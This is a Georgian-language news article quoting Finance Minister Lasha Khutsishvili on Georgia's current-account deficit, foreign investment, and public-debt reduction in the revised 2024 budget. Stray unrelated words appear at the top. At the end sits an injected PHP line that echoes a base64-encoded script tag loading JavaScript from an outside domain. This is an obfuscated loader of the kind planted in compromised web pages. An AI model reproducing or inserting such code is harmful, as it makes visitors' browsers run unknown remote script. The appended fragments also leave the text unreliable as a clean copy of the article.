celsiusi
ავერსი შნაიდერი

ეკონომიკური ზრდის მაღალი ტემპის შესანარჩუნებლად, მაკროეკონომიკური სტაბილურობის უზრუნველყოფა მთავარი ამოცანაა - ამის შესახებ ფინანსთა მინისტრმა, ლაშა ხუციშვილმა 2024 წლის ბიუჯეტის პროექტის გადამუშავებული ვერსიის წარდგენისას განაცხადა.

მისი თქმით, საქართველოში ისტორიულად მაკროეკონომიკური სტაბილურობის მთავარი გამოწვევა მიმდინარე ანგარიშის მაღალი დეფიციტი იყო.

„ბოლო წლებში გატარებული რეფორმების შედეგად, თუ პანდემიის პერიოდს, 2020-2021 წლებს მხედველობაში არ მივიღებთ,  ფაქტობრივად, ყოველწლიურად გვაქვს მიმდინარე ანგარიშის დეფიციტის კლება. 2022 წლისათვის, მიმდინარე ანგარიშის  ბალანსი რეკორდულად დაბალ 4.6%-იან ნიშნულზე დაფიქსირდა. ჩვენი მოლოდინით, 2023 წელსაც დეფიციტს მსგავს დონეზე შევინარჩუნებთ. 2022 წლისათვის დაიწყო მთლიანი ინვესტიციების მშპ-სთან ფარდობის მაჩვენებლის ზრდა და ასევე, პირდაპირი უცხოური ინვესტიციების რეკორდულად მაღალი მაჩვენებელი დაფიქსირდა. 2022 წელს პირდაპირმა უცხოურმა ინვესტიციებმა ისტორიულ მაქსიმუმს - 2.1 მილიარდ დოლარს მიაღწია. ისტორიულად მაღალი მაჩვენებლები ფიქსირდება 2023 წელსაც, წლის პირველ ნახევარში FDI-ის შემოდინებამ მილიარდ 72 მილიონი შეადგინა, რითაც 10,9 პროცენტით გადააჭარბა შარშანდელ მაჩვენებელს“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

ლაშა ხუციშვილის განცხადებით, წლების განმავლობაში საქართველო იყო ფისკალური დისციპლინით გამორჩეული ქვეყანა და ვალი ნარჩუნდებოდა უსაფრთხო დონეზე.

„სწორედ ამან მოგვცა საშუალება, რომ პანდემიის გამოწვევისთვის გვეპასუხა შესაბამისი ფისკალური ხარჯებით და ეს ყველაფერი ისე მოვახერხეთ, რომ ხელი არ შეგვეშალა პოსტ-კრიზისული აღდგენისათვის. ჩვენ რეკორდულად დაბალ დროში შევძელით, როგორც მაკროეკონომიკური მაჩვენებლების, ისე ფისკალური პარამეტრების სრულად აღდგენა. მთავრობის ვალის დონე, რომელიც 2020 წელს 60-პროცენტიან ნიშნულს გადასცდა, 2024 წლისთვის 38%-მდე მცირდება. ეს არის 3 წლის განმავლობაში ვალის დონის 20 პროცენტული პუნქტით შემცირება, რაც ნამდვილად იშვიათი გამონაკლისია მსოფლიოში. ჩვენ ვაჩვენეთ ფისკალური კონსოლიდაციის ის იშვიათი მაგალითი, როდესაც 2 წელიწადში სრულად აღდგა ვალი უსაფრთხო დონეზე (40%-ზე დაბალ ნიშნულზე), და ამავდროულად, ხელი არ შეგვიშლია ეკონომიკური ზრდისთვის. მეტიც, გვქონდა ორნიშნა ეკონომიკური ზრდა“, - განაცხადა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

მისი თქმით, ქვეყანა ერთგული რჩება ვალის პორტფელის დივერსიფიკაციის მიზნის.

„საშუალოვადიან პერიოდში მიზნად ვისახავთ ვალის დოლარიზაცია 65 პროცენტს ქვემოთ შევამციროთ, რაც განსაზღვრულია, ასევე, საქართველოს ვალის მართვის სტრატეგიის შესაბამისად. ჩვენ უკვე შევძელით ეს მაჩვენებელი 80 პროცენტიდან 72 პროცენტამდე ჩამოგვეყვანა და ამ პოლიტიკას მომავალშიც გავაგრძელებთ. ამავდროულად, გავაგრძელებთ ფასიანი ქაღალდების ადგილობრივი ბაზრის განვითარებას. ბოლო წლებში მნიშვნელოვნად გავზარდეთ გამოშვებები და გაიზარდა ბაზრის ლიკვიდურობაც. საშუალოვადინ პერიოდში ჩვენი მიზანია, საქართველოს ვალის პორტფელი მოვამზადოთ საერთაშორისო ინდექსებისათვის“, - აღნიშნა ფინანსთა მინისტრმა, ლაშა ხუციშვილმა.

349
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");